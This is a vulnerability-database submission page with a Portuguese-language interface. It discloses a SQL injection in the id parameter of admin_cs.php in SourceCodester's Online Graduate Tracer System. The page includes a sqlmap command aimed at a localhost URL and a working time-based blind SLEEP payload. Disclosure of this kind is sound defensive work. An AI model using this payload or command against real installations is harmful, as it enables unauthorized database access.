Submeter #99590: SourceCodester Online Graduate Tracer System admin_cs.php sql injectioninformação

TítuloSourceCodester Online Graduate Tracer System admin_cs.php sql injection
DescriçãoSourceCodester Online Graduate Tracer System admin_cs.php sql injection url:tracking/admin/admin_cs.php Abstract: Line 241 of admin_cs.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands. Explanation: SQL injection errors occur when: Data enters a program from an untrusted source. The data is used to dynamically construct a SQL query. In this case the data is passed to mysqli_query() in admin_cs.php at line 241. sqlmap.py -u http://127.0.0.1/shenji/tracking/admin/admin_cs.php?id=1111 --current-db Parameter: id (GET) Type: time-based blind Title: MYSQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id:1111'AND (SELECT 5126 FROM (SELECT(SLEEP(5)))BFUF) ANDIgBK':'IgBK Download Code: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html
Fonte⚠️ https://blog.csdn.net/weixin_43864034/article/details/129418770
Utilizador
 bit3hh (UID 42576)
Submissão09/03/2023 04h54 (há 3 anos)
Moderação09/03/2023 15h30 (11 hours later)
EstadoAceite
Entrada VulDB222647 [SourceCodester Online Graduate Tracer System 1.0 admin_cs.php mysqli_query Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Interested in the pricing of exploits?

See the underground prices here!